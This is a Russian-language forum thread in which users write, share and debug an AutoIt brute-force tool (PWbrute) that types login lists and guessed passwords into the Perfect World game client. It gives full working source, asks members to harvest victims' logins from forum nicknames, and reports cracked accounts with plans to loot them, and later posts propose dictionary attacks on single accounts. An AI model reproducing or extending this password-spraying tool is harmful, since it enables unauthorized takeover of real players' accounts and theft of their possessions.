PDA

Просмотр полной версии : Элементарный брут


Ta[2]
27.01.2010, 15:21
Привет всем вот до чего пьянство и ленивость делает. :agreed:

Ну чтож начнём. Во первых нам надо AutoIt.

вот тело скрипта:

If WinExists(@ScriptName) Then Exit
AutoItWinSetTitle(@ScriptName)
HotKeySet("{ESC}", "Terminate")

$sFilePath = @ScriptDir & "\логин.txt" ;файл в папке со скриптом
$sLines = _FileCountLines($sFilePath) ; возвращает количество строк в файле

WinWait("название окна","")
If Not WinActive("Element Client","") Then WinActivate("Element Client","")
WinWaitActive("Element Client","")

For $i = 1 To $sLines ; от 1 до количества строк в файле выполнять:
$command = FileReadLine($sFilePath, $i)
Send($command&"{TAB}пароль")
Sleep(20)
Send("{ENTER}")
Sleep(20)
Send("{ENTER 2}") ; послыает два раза Enter
Sleep(50)
Next

Func Terminate()
Exit 0
EndFunc


А теперь самое главное. Требуются помощники по собиранию логинов.
Как это сделать? У многих на руоффе логин совпадает с ником на форуме. Так что разбираем по буквам и начинаем составлять списки. Я как первый собираю под буквой A и a. Логины составлять построчно т.е. строка - логин, следующая строка - логин.

Ну и выкладываем тута)

Добавлено через 1 минуту
Если кто то не понял как он работает ... перебирает логины при заданном пароле.

Добавлено через 7 минут
Так же можете его переделать немного и используя словари паролей брутить какой нить 1 акк

P/S Скорость невысокая так как работает методом ввода в игровом окне.

P/S/2 Путём замены названия Окошка игры работает с любой онлайновой игрой.

Добавлено через 1 час 44 минуты
WinWait("Element Client","")

забыл изменить сорь

Добавлено через 2 часа 7 минут
упс ещё в шапку вставьте
#include <file.au3>

Dinmaite
27.01.2010, 17:50
Зачем каждому брать по букве? Немного смекалки и вот она база ников)

Dinmaite
27.01.2010, 17:51
Тьфу, опять забыл приаттачить, кто придумал что в подполье нельзя править свои посты?

Ta[2]
27.01.2010, 18:08
Так прикрутил ввод пароля в самой программе и оформил ЕХЕ-шником.
Работает только с оригинальным названием окна.

[Ссылки могут видеть только зарегистрированные и активированные пользователи]

Dinmaite
27.01.2010, 18:17
А почему бы не добавить функцию подбора значений из списка паролей к значениям списка логинов. Вот это юудет брут раз врубил и месяц подбирает :)

Ta[2]
27.01.2010, 23:44
завтра прикручу чтоб валидные пароли и логины сохраняло ... просто это достаточно трудоёмко ... ответ с севрвера на пакетном уровне зашифрован ... выцепить никак .... придётся чтото по времени ответа монстячить ...

Я так то первый день в программинге так что не ругайте сильно.

Добавлено через 10 минут
Я щас от смеха сдохну .... только на букву А с твоего списка на пароль qwerty 12 валидных акков))))))

Ta[2]
28.01.2010, 00:06
Дак сбруть ... на данный момент как только увидел что пошло время сразу ESC жми ... чтоб брут остановился ... и шпарь ... я просто акки выловил но сервер настроен в клиенте Астра хз кто там висит.

Добавлено через 1 минуту
надо строчно прикрутить валидность чтоб записовалось ... бля если увижу на других ресурсах :voin: всем.

Добавлено через 20 минут
так ... как валидность прикрутить придумал ... надо чтоб искало всё время цвет в определённой точке ... если цвет совпадёт ( ну там рамка например что типа время на вход в игру или кусочек рамки при выборе перса ) чтоб записывало оттдельно в txt логин и пароль ... исходник на работе щас только ехе-щником пользуюсь.

Если надо то могу сделать по 2-м спискам чтоб парсило и логин и пароль.

Добавлено через 58 минут
если делать валидность как я придумал ... народ определитесь с разрешением игры в окне ... чтоб я коорды сигнальных точек записал.

Добавлено через 11 часов 9 минут
так .... PWbrute v0.1a [Ссылки могут видеть только зарегистрированные и активированные пользователи]
исправил ошибки с кнопками, теперь не брутит с пустым паролем, ну и вставил приветы)

Ta[2]
28.01.2010, 11:28
В этом пока минус брута ... вот прикручу распознавалку и чтоб записывало отдельно. Пока можно только войти пошариться по акку.

Так у меня на работе чёт отказывается ПВ запускаться. Кто нить заскриньте когда ожидание захода и меню выбора персонажа. Скрины в bmp пожалуйста, чтоб искажения цвета небыло.

Добавлено через 2 минуты
Пока не забыл. Скрины в 800х600 )

Dinmaite
28.01.2010, 11:51
А лучше не заморачиваться с разрешениями и брать пиксель 1,1. При входе на страничку с персом цвет меняется, при чем этот пиксел не должен зависеть от разрешения.

Ta[2]
28.01.2010, 11:52
чёйто памяти у меня совсем нету ... переход с ввода на выбор персонажа мгновенный?

Добавлено через 2 минуты
кстати вот исходник

#include <file.au3>

; Loop around until the user gives a valid "autoit" answer
$bLoop = 1
While $bLoop = 1

$text = InputBox("PWbrute v0.1a от Ta[2]", "В папке с брутом должен быть логин.txt с логинами. Кнопка ESC остановить брут. Введите предполагаемый пароль:")
If @error = 1 Then
MsgBox(4096, "Error", "Повезёт в другой раз Zhyk.ru & Zhyk.org")
Exit 0
Else
If $text = "" or $text = " " Then
MsgBox(4096, "Error", "Поле пароля пустое!")

Else
$bLoop = 0 ; Exit the loop - ExitLoop would have been an alternative too :)
EndIf
EndIf
WEnd
If WinExists(@ScriptName) Then Exit
AutoItWinSetTitle(@ScriptName)
HotKeySet("{ESC}", "Terminate")

$sFilePath = @ScriptDir & "\логин.txt" ;файл в папке со скриптом
$sLines = _FileCountLines($sFilePath) ; возвращает количество строк в файле

WinWait("Element Client","")
If Not WinActive("Element Client","") Then WinActivate("Element Client","")
WinWaitActive("Element Client","")

For $i = 1 To $sLines ; от 1 до количества строк в файле выполнять:
$command = FileReadLine($sFilePath, $i)
Send($command&"{TAB}")
Sleep(20)
Send($text)
Sleep(20)
Send("{ENTER}")
Sleep(20)
Send("{ENTER 2}") ; послыает два раза Enter
Sleep(50)
Next

Func Terminate()
Exit 0
EndFunc

а то мало ли я тупить начну ... а кто нить подхватит.

Dinmaite
28.01.2010, 11:55
нет, он зависит от скорости соединения.

Ta[2]
28.01.2010, 13:45
Версия 0.1b читайте ридмишку.

[Ссылки могут видеть только зарегистрированные и активированные пользователи]

Добавлено через 1 минуту
AutoIt вот начал изучать ... 2-ой день :wow:

Добавлено через 2 минуты
ща прикручу)

Добавлено через 16 минут
Так чистой функции ПАУЗА я не нашёл ... есть только приостановить работу на определённое время ((( ... но функция паузы есть на иконке в трее когда рут работает.

Теперь записывает в отдельный файл какие логины уже прогнал.

Ta[2]
28.01.2010, 15:57
[Ссылки могут видеть только зарегистрированные и активированные пользователи]

PWbrute v0.1c

вроде как должен отслеживать изменение картинки и делать запись в тест.

Добавлено через 7 минут
так пишут не работает тогда ждёмс

AlexesZ
31.01.2010, 15:13
;140927'][Ссылки могут видеть только зарегистрированные и активированные пользователи]

PWbrute v0.1c


выдает ошибку при передобе около 100-150 акков...

lidylka
31.01.2010, 16:39
Народ. Вот у меня есть друзья, за которых волнуюсь, что их взломают... сильно... Они есть в первом списке =_= (хотя странно, меня там нет XD).

Поэтому сразу спрашиваю - какой пароль бруту не по силе? Правда стало страшновато.

Добавлено через 3 минуты
Или я правильно сначала поняла, что этот брут брутит не пароли, а логины и подставляет желаемый пароль? xD

Может, сделать нормально тогда? Написать программку-генератор паролей (10-20 символов) и так брутить?.. Вроде, нормальные бруты работают именно так О_о"

Dinmaite
31.01.2010, 17:02
Чистый брутфорс не дает особенно быстрых результатов, одна генерация паролей займет уйму времени. А по сути пароль класса "w#4fpR6l8ohv" можно брутить лет 10(имхо).

Ta[2]
01.02.2010, 13:16
Так начну с плохого ... проверку на валидность акка с записью в тест и продолжение перебора ... с нормальной скоростью не возможна( так как после ввода логина и парля даже если он правильный переход не мгновенный ... за это время брут успевает ещё кучу логинов перебрать ... если делать медленнее скорость чтоб успевало записать то 1 пароль будет проверять в среднем 2 секунды.

Нормальный брут должен работать на пакетном уровне ... а пакеты зашифрованы( ... так что этот брут так разминка для ума ... тупо перебор до первого попавшегося и просто поскидывать с него всё что доступно.

Щас попробую связаться с разрабами огг бота ... у них часть пакетов декомпилировано ... может повезёт урвать пакетик отзыва сервера.

Добавлено через 1 минуту
так же могу предложить переделать брут под словарь с взломом введённого акка.

lidylka
01.02.2010, 23:03
выдает ошибку при передобе около 100-150 акков...

;142800']Так начну с плохого ... проверку на валидность акка с записью в тест и продолжение перебора ... с нормальной скоростью не возможна( так как после ввода логина и парля даже если он правильный переход не мгновенный ... за это время брут успевает ещё кучу логинов перебрать ... если делать медленнее скорость чтоб успевало записать то 1 пароль будет проверять в среднем 2 секунды.

Нормальный брут должен работать на пакетном уровне ... а пакеты зашифрованы( ... так что этот брут так разминка для ума ... тупо перебор до первого попавшегося и просто поскидывать с него всё что доступно.

Щас попробую связаться с разрабами огг бота ... у них часть пакетов декомпилировано ... может повезёт урвать пакетик отзыва сервера.

Добавлено через 1 минуту
так же могу предложить переделать брут под словарь с взломом введённого акка.

Ошибочка вылетает =.=

Ta[2]
02.02.2010, 10:22
Брут по баззе аков:

[Ссылки могут видеть только зарегистрированные и активированные пользователи]

версия 0.2a ... убрал запись в тест из-за него ошибка и вылетала.


Брут при заданном акке с перебором паролей:

[Ссылки могут видеть только зарегистрированные и активированные пользователи]

версия 0.2b в папке с брутом должен быть пароль.txt
надеюсь словари для брута сможете сами скачать с инета ... на работе просто нет возможности их скачать (((( траффик.

Добавлено через 5 минут
да чтож тут править то нельзя.

[Ссылки могут видеть только зарегистрированные и активированные пользователи] вот брут по перебору по паролям.

Добавлено через 46 минут
Так думаю что нашёл того кто сможет сделать нормальный брут.

На Лолчите нашёл вот что:

программа коннектится к серву, заходит чаром и слушает чат
также ведется примитивный лог
вот пример её работы:
Код:

-----------------------
Server : 213.152.136.29
Login : Test*****
Password : *******
-----------------------
Connecting...
-----------------------
Found Characters:
Exception [2 lvl]
-----------------------
Selecting character...OK
Entering world...
[!] Витцн: Продам Штаны дракона! только цены мне вПМ
[!] Dal: Поздравляю одного из самых пряморуких танков этого серва Тирана с Днюхой!!!

Оригинальный пост : [Ссылки могут видеть только зарегистрированные и активированные пользователи]

Но человек с форума пропал, а на файлообменниках уже потёрли файлы.
Программа работает на пакетном уровне так что если её переделать в брут то скорость будет огого.

Но как выяснилось я когда тоскачал его ОГГ исходник бота теперь надо садиться изучать язык MSVC2008, в качестве платформы - WinAPI

[Ссылки могут видеть только зарегистрированные и активированные пользователи]

Если у кого есть познания в нём ... милости прошу.

lidylka
02.02.2010, 17:55
А нельзя сделать так, чтобы процесс происходил в окне, а не во всей машине? В общем, чтобы можно было закрыть окно и не париться? Я не программист, как таковы, поэтому просто спрашиваю =) А то, как посчитала, в среднем на фулл брут требуется 4-6 часа (примерно по 1-2 секунде на 1 логин), а у меня таков комп, что каждые 2 часа если не трогать - он просто вырубается, переходит в ждущий режим... И при этом полностью сворачивает все программы и "занавес закрывается". И все, и ничего. Режим не отключить - встроено в блок питания О_о'

Ta[2]
04.02.2010, 00:25
Так по поводу брута при закрытом ( неактивном окне сделать можно ... но немного геморно ... в атоите это как бы выразиться через не лицо сделано :d )

Я вот что хочу спросить ... может стоит выложить в паблик этот недобрут? Я вроде как понял уже принцип пакетного ... дайте недельку и сваяем OGG брут без клиента) ... толку от этого "брута" мало ... так баловство одно ... только без базы отдать и попросить свои удачи чтоб выкладывали ... базу паролей глядишь соберём))

Жду ответов)

Froxc
02.02.2011, 22:04
Прочитв все я запутался))) Можно так сказать мини гайдик по бруту =) если не сложно)

VeTaL_UA
02.02.2011, 22:49
Берёшь логины, закидываешь в файл логин.тхт. Запускаешь брут ==> запускаешь PW ==> в окошке вписываешь предпологаемый пароль ==> начинаешь брутить ==> получаешь бан по ip через 5 минут. Вот и весь алгоритм)

gros12345
08.04.2011, 10:29
у меня почемуто пишет ошибку в $sLines = _FileCountLines($sFilePath),хотя скопировал все правильно,что делать?

Добавлено через 19 минут
If WinExists(@ScriptName) Then Exit
AutoItWinSetTitle(@ScriptName)
HotKeySet("{ESC}", "Terminate")
$sFilePath = @ScriptDir & "логин.txt";
$sLines = _FileCountLines($FilePath);
WinWait("Perfect World","")
If Not WinActive("Perfect World","") Then WinActivate("Perfect World","")
WinWaitActive("Perfect World","")
For $i = 1 To $sLines ;
$command = FileReadLine($sFilePath, $i);
Send($command&"{TAB}пароль")
Sleep(20)
Send("{ENTER}")
Sleep(20)
Send("{ENTER 2}") ;
Sleep(50)
Next
Func Terminate()
Exit 0
EndFunc
Вот так я сделал,и пишет ошыбку,что делать?

Sirioga
08.04.2011, 12:12
у меня почемуто пишет ошибку в $sLines = _FileCountLines($sFilePath),хотя скопировал все правильно,что делать?
Для использования функции _FileCountLines нужно винклюдить File.au3
Вверху скрипта написать include <File.au3>

VeTaL_UA
16.09.2011, 14:35
перезалейте плиз, не находит по прошлым ссылкам
Выкладываю то, что у меня есть:
PWbrute v0.2a(1 ([Ссылки могут видеть только зарегистрированные и активированные пользователи]*********/fd21153),2 ([Ссылки могут видеть только зарегистрированные и активированные пользователи]),3 ([Ссылки могут видеть только зарегистрированные и активированные пользователи]),4 ([Ссылки могут видеть только зарегистрированные и активированные пользователи]),5 ([Ссылки могут видеть только зарегистрированные и активированные пользователи]),VirusTotal ([Ссылки могут видеть только зарегистрированные и активированные пользователи] d65bae9969058e923dbe1587e9a7a-1316171357),VirusSkan ([Ссылки могут видеть только зарегистрированные и активированные пользователи]))
PWbrute v0.2b(1 ([Ссылки могут видеть только зарегистрированные и активированные пользователи]*********/fd21155),2 ([Ссылки могут видеть только зарегистрированные и активированные пользователи]),3 ([Ссылки могут видеть только зарегистрированные и активированные пользователи]),4 ([Ссылки могут видеть только зарегистрированные и активированные пользователи]),5 ([Ссылки могут видеть только зарегистрированные и активированные пользователи]),VirusTotal ([Ссылки могут видеть только зарегистрированные и активированные пользователи] 5c8783aed399eb1886da3acc0f06a-1316171887),VirusSkan ([Ссылки могут видеть только зарегистрированные и активированные пользователи]))

mumon
19.02.2012, 22:00
А как узнать пошёл процесс или нет? После всех операций прога свернулась в трей и тишинаааа.....
И непонятно что-то, что должно произойти при совпадении логина и пароля - будет выполнен ли вход на акк или что?

=Калипсо=
27.03.2012, 02:36
Попробуй развернуть окно ПВ и увидиш чудо=))Кстате, если пишет какие-то каракули в поле логина и пароля,то попробуйте поменять кодировку текстовых документов(логин.тхт или соответственно пароль.тхт)



Попробуйте после запуска программы,окно ПВ развернуть=))

к сожалению не помогает развернуть окно( как анпаузить? , подскажите незнайке):emolol:

VeTaL_UA
27.03.2012, 17:50
к сожалению не помогает развернуть окно( как анпаузить? , подскажите незнайке)
Разморозьте окно игры.